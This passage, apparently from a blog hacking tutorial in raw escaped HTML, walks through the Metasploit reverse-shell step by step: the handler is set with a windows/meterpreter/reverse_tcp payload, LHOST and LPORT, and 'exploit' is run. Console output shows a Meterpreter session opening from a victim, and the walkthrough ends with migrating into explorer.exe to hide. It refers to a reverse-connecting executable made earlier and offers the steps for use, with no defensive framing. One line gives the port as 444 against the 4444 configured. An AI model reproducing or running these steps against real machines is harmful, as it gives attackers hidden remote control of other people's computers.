&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXq717yQtT1SM1Ky-bEwqEH7AvMDpreQVYTaFIwLdUwnk6G1ztDcSb9szmtDBdN84b5j_4RPkI4QUTCyr-apvBymjMDskM3v29McM5bJbFWPVYSEPZVXcmGldRdj3G64VFkcXpa6fDb_yv/s1600/step2.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584373403836423890&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXq717yQtT1SM1Ky-bEwqEH7AvMDpreQVYTaFIwLdUwnk6G1ztDcSb9szmtDBdN84b5j_4RPkI4QUTCyr-apvBymjMDskM3v29McM5bJbFWPVYSEPZVXcmGldRdj3G64VFkcXpa6fDb_yv/s320/step2.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 238px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;msf exploit(handler) &amp;gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;PAYLOAD =&amp;gt; windows/meterpreter/reverse_tcp&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ7mlXFekHERhum1KftJ1Hi15vkYGgGrsAYZe6NNOJH6nTLbyhmddGnS43dzqY-loONUN1-sKD6BF5SE-Rm6fgWv3nd-JDqTitObe-codIDXLhwyIrLJIiLoom8OGUHa_PXg8axKPOCCQ4/s1600/step4.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584373412694895858&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ7mlXFekHERhum1KftJ1Hi15vkYGgGrsAYZe6NNOJH6nTLbyhmddGnS43dzqY-loONUN1-sKD6BF5SE-Rm6fgWv3nd-JDqTitObe-codIDXLhwyIrLJIiLoom8OGUHa_PXg8axKPOCCQ4/s320/step4.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 238px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;msf exploit(handler) &amp;gt; set LHOST 192.168.255.130&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;LHOST =&amp;gt; 192.168.255.130&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;msf exploit(handler) &amp;gt; set LPORT 4444&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;LPORT =&amp;gt; 4444&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie60B3nAHyUImp4YGwio4YF6o_01UqEKddn8esJYni_5Ke0vebXoOrktud7nZFx3lRXdQKo5eHCMEUvlpXHI3_0DoOQy5yh6SYcZ8F-BQ-7IltsCRb7ldoRqLDQ5s_IVo7Gm96GU-W-IcM/s1600/step6.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584373420024482226&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie60B3nAHyUImp4YGwio4YF6o_01UqEKddn8esJYni_5Ke0vebXoOrktud7nZFx3lRXdQKo5eHCMEUvlpXHI3_0DoOQy5yh6SYcZ8F-BQ-7IltsCRb7ldoRqLDQ5s_IVo7Gm96GU-W-IcM/s320/step6.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 237px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;All the connections are done. You have already made an executable file which makes a reverse connection to you.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;And now, you have set the meterpreter to listen to you on port 4444.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;The last step you have to do now, is to type in “exploit” and press enter,&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;msf exploit(handler) &amp;gt; exploit&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNLYyVJsejCT5u3FmSJqZ5O2xhYRbb15zJkVjpgt3KAEo9htObTIMQ1UWo9RlcRN1LxAvdgBfpxBeTbUVdoJ29OI-gNVb_cVyIf2YU9AwdqwUz_vPRorH5wTpoFUyE8LwjUn8rcj9d79k/s1600/step7.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584374208950323394&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNLYyVJsejCT5u3FmSJqZ5O2xhYRbb15zJkVjpgt3KAEo9htObTIMQ1UWo9RlcRN1LxAvdgBfpxBeTbUVdoJ29OI-gNVb_cVyIf2YU9AwdqwUz_vPRorH5wTpoFUyE8LwjUn8rcj9d79k/s320/step7.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 237px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;[*] Started reverse handler on&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;http://192.168.255.130:4444/&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: blue; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;192.168.255.130:4444&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;[*] Starting the payload handler...&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Now, the payload is listening for all the incoming connections on port 444.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;[*] Sending stage (749056 bytes) to 192.168.255.1&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;[*] Meterpreter session 1 opened (&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;http://192.168.255.130:4444/&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: blue; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;192.168.255.130:4444&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&amp;nbsp;-&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;http://192.168.255.1:62853/&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: blue; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;192.168.255.1:62853&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;) at Sun Mar 13 11:32:12 -0400 2011&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip10N-eSEvKEJyVrQZoE1eME_EfZk9IcLFAYLDj0Nps6rk3QXX7bqX7qKPZq9YGMahRPKjZTxwy38fBD_rgTW7ECqbHvXYR-BaaedhZzhm5iJayyMUR5hIlud3S1cw7bTg2UiZRupkzOmM/s1600/connection+established.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584375238135963698&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip10N-eSEvKEJyVrQZoE1eME_EfZk9IcLFAYLDj0Nps6rk3QXX7bqX7qKPZq9YGMahRPKjZTxwy38fBD_rgTW7ECqbHvXYR-BaaedhZzhm5iJayyMUR5hIlud3S1cw7bTg2UiZRupkzOmM/s320/connection+established.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 238px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;You would see a meterpreter prompt like this&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;meterpreter &amp;gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
Type in ps to list the active processes&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;meterpreter &amp;gt; ps&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJZf_XfXKx-tpYBGh2-xOfGsd1sCTppJwWFW7-VKt57pyAg8A5l1g7Ql6MRE3WhO4RlxedNkbYXTohSZ4w1QCoW12H1eN06im0OovHfZkRVkfKQGmeUR_Vo4gfNkEipZrtpapcQAV25KIK/s1600/processes.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584374645987407842&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJZf_XfXKx-tpYBGh2-xOfGsd1sCTppJwWFW7-VKt57pyAg8A5l1g7Ql6MRE3WhO4RlxedNkbYXTohSZ4w1QCoW12H1eN06im0OovHfZkRVkfKQGmeUR_Vo4gfNkEipZrtpapcQAV25KIK/s320/processes.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 239px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Search for explorer.exe and migrate to the process&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;meterpreter &amp;gt; migrate 5716&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;[*] Migrating to 5716...&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;[*] Migration completed successfully.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;meterpreter &amp;gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
